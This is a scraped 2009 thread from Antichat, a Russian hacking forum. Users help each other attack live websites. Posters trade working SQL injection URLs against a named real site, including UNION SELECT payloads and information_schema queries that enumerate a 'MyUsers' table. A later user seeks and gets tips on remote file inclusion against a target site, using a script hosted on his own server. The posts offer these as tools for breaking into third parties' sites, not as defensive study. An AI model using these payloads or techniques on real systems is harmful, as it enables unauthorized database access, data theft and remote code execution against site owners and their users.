Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.11.2009, 20:13
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от YuNi|[c
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations%00
|
|
|
10.11.2009, 20:27
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Сообщение от ElteRUS
2Fed123,
cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema.tables)--
Хм ну как-то так вроде, поэкспериментируй
Спасибо,все получилось.Теперь пролема с колонками 
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
|
|
|
|
10.11.2009, 21:01
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от 2Fed123
Спасибо,все получилось.Теперь пролема с колонками
При запросе
Код:
-34+union+select+top+1+1,2,3,4,5,6,column_name,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
Код:
-34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyUsers’ +LIMIT+1,1--
почитать можно тут:
https://forum.antichat.ru/thread43966.html
|
|
|
|
10.11.2009, 21:04
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от [aywo]
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations%00
правильнее этот запрос:
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations+where+1%00
выдает открывает страницу норм, но там нету ни одного visible поля (((
|
|
|
|
10.11.2009, 21:11
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от YuNi|[c
правильнее этот запрос:
Код:
http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+Situations+where+1%00
выдает открывает страницу норм, но там нету ни одного visible поля ((( чем он правильнее???
скуля не принтабельна, поэтому и не выводится ниодного поля
|
|
|
|
10.11.2009, 21:23
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://wallstreetcorner.com/ss2.html?Symbol=%'%20union%20select%201,2,3,4,5,6, 7,8,'Privetttt',10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46%20from%20Situations%00
Только понта с этого нету.
Выводится в адресную строку браузера 9 поле где привет написано)
Последний раз редактировалось ILYAtirtir; 10.11.2009 в 21:26..
|
|
|
|
11.11.2009, 00:11
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru
на мой сайт залил скрипт:
Код:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149
мой код на сервере под названием ххх.php.
я переделываю ссылку так:
http://www.123.ru/index.php?action= http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id= http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.
Я ошибку делаю, или просто на сайте фильтровывается ?
P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html |
|
|
|
11.11.2009, 00:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834
Репутация:
90
|
|
что то ты путаешь, с чего ты взял что переменная id на сайте www.123.ru вообще что-то инклюдит, тем более что-то удаленное?
|
|
|
|
11.11.2009, 00:27
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Да и инклудить надо не php скрипты на удалённом сервере...а txt например.
|
|
|
|
11.11.2009, 00:37
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ммм, ребята, читая ЭТУ статью - так получается...
можете сказать как делать тогда ? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.gif){kind=avatar}
![Отправить сообщение для [aywo] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
